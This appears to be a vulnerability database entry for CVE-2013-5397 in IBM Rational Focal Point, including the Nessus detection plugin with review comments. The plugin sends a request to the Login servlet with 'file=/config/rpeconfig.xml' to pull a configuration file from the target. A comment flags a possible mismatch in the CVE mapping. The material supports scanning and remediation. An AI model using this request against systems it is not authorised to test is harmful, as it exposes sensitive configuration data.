Vulnerabilities > CVE-2013-5397 - Information Disclosure vulnerability in IBM Rational Focal Point Webservice Axis Gateway

047910
CVSS 3.3 - LOW
Attack vector
ADJACENT_NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
NONE
Availability impact
NONE
low complexity
ibm
nessus

Summary

Unspecified vulnerability in the Webservice Axis Gateway in IBM Rational Focal Point 6.4 before devfix1, 6.4.1.3 before devfix1, 6.5.1 before devfix1, 6.5.2 before devfix4, 6.5.2.3 before devfix9, 6.6 before devfix5, 6.6.0.1 before devfix2, and 6.6.1 allows remote attackers to bypass intended access restrictions and obtain sensitive information via unspecified vectors, a different vulnerability than CVE-2013-5398.

Nessus

NASL family: CGI abuses
NASL id: IBM_RATIONAL_FOCALPOINT_LOGIN_FILE_DISCLOSURE.NASL
description: Nessus was able to exploit a file disclosure vulnerability in the Login servlet on the remote IBM Focal Point install. A remote attacker could potentially use this vulnerability to view sensitive files (such as configuration files).
last seen: 2020-06-01
modified: 2020-06-02
plugin id: 72861
published: 2014-03-06
reporter: This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
source: https://www.tenable.com/plugins/nessus/72861
title: IBM Rational Focal Point Login Servlet File Disclosure
code
#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

# Plugin registration. When `description` is set, only the metadata below is
# registered and the script exits (exit(0) at the end of this block) before
# the active check further down is reached.
if (description)
{
  script_id(72861);
  script_version("1.5");
  script_cvs_date("Date: 2019/11/26");

  # NOTE(review): the plugin name and description below refer to the Login
  # servlet, whereas the CVE-2013-5397 summary shown with this plugin describes
  # the Webservice Axis Gateway and calls CVE-2013-5398 a different issue.
  # Confirm which CVE the Login servlet file disclosure maps to before using
  # this id for tracking or remediation reporting.
  script_cve_id("CVE-2013-5397");
  script_bugtraq_id(64338);

  script_name(english:"IBM Rational Focal Point Login Servlet File Disclosure");
  script_summary(english:"Tries to exploit file disclosure vulnerability");

  # Text shown to the operator in the scan report.
  script_set_attribute(attribute:"synopsis", value:
"The remote host is affected by a file disclosure vulnerability.");
  script_set_attribute(attribute:"description", value:
"Nessus was able to exploit a file disclosure vulnerability in the Login
servlet on the remote IBM Focal Point install.  A remote attacker could
potentially use this vulnerability to view sensitive files (such as
configuration files).");
  # References: the ZDI advisory and the vendor advisory that carries the fix.
  script_set_attribute(attribute:"see_also", value:"https://www.zerodayinitiative.com/advisories/ZDI-13-284/");
  script_set_attribute(attribute:"see_also", value:"http://www-01.ibm.com/support/docview.wss?uid=swg21654471");
  script_set_attribute(attribute:"solution", value:
"Apply the appropriate patch per the referenced vendor advisory.");
  # CVSS v2 base vector: adjacent-network access, low complexity, no
  # authentication, partial confidentiality impact, no integrity or
  # availability impact. The score is taken from the CVE entry (see
  # cvss_score_source), not derived from what this check observes.
  script_set_cvss_base_vector("CVSS2#AV:A/AC:L/Au:N/C:P/I:N/A:N");
  # Temporal vector: proof-of-concept exploit, official fix available,
  # report confidence confirmed.
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
  script_set_attribute(attribute:"cvss_score_source", value:"CVE-2013-5397");

  # Exploitability metadata; "exploited_by_nessus" marks that the check below
  # requests a file from the target rather than only comparing versions.
  script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
  script_set_attribute(attribute:"exploit_available", value:"true");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  # Disclosure and patch were published on the same day; the plugin followed
  # a few months later.
  script_set_attribute(attribute:"vuln_publication_date", value:"2013/12/13");
  script_set_attribute(attribute:"patch_publication_date", value:"2013/12/13");
  script_set_attribute(attribute:"plugin_publication_date", value:"2014/03/06");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:ibm:rational_focal_point");
  script_end_attributes();

  # ACT_ATTACK: the check sends a request that retrieves a file from the
  # target, so it belongs with the active checks rather than passive ones.
  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");

  # Run only after the Focal Point detection plugin; presumably that plugin
  # sets the required KB key -- verify against the detection plugin.
  script_dependencies("ibm_rational_focalpoint_login_detect.nbin");
  script_require_keys("www/ibm_rational_focal_point");
  script_require_ports("Services/www", 9080);

  exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("url_func.inc");
include("webapp_func.inc");

# Active check: request one known configuration file through the Login
# servlet and report the host only if the response body looks like that file.

# HTTP port of the web service under test (9080 when nothing else is known).
port = get_http_port(default:9080);

# Install record for Focal Point on this port; with exit_on_fail set, the
# script stops here when no install is recorded in the KB.
fp_install = get_install_from_kb(
  appname      : "ibm_rational_focal_point",
  port         : port,
  exit_on_fail : TRUE
);

base_dir = fp_install['dir'];

# URL used for the check; it is also what gets printed in the report.
probe_url = base_dir + "/fp/servlet/Login?file=/config/rpeconfig.xml";

# exit_on_fail ends the script when the request itself fails.
reply = http_send_recv3(
  port            : port,
  method          : 'GET',
  item            : probe_url,
  exit_on_fail    : TRUE
);

# reply[2] is the response body. All four markers have to be present, so an
# unrelated XML document or error page is not reported as a disclosure.
body = reply[2];
file_disclosed = (
  "<?xml" >< body && "<config>" >< body &&
  "IBM Corporation" >< body && '<feature tag="Load">' >< body
);

if (!file_disclosed)
{
  # A "not affected" result reflects only this single request; it is not a
  # statement about the installed fix level.
  audit(AUDIT_WEB_APP_NOT_AFFECTED, "IBM Rational Focal Point", build_url(port:port, qs:base_dir));
}
else
{
  if (report_verbosity > 0)
  {
    # The verbose report carries the URL that was requested, not the file
    # contents that came back.
    report_header = 'Nessus was able to verify the vulnerability using the following URL';

    details = get_vuln_report(
      items   : probe_url,
      port    : port,
      header  : report_header
    );

    security_note(port:port, extra:details);
  }
  else
  {
    security_note(port);
  }
  exit(0);
}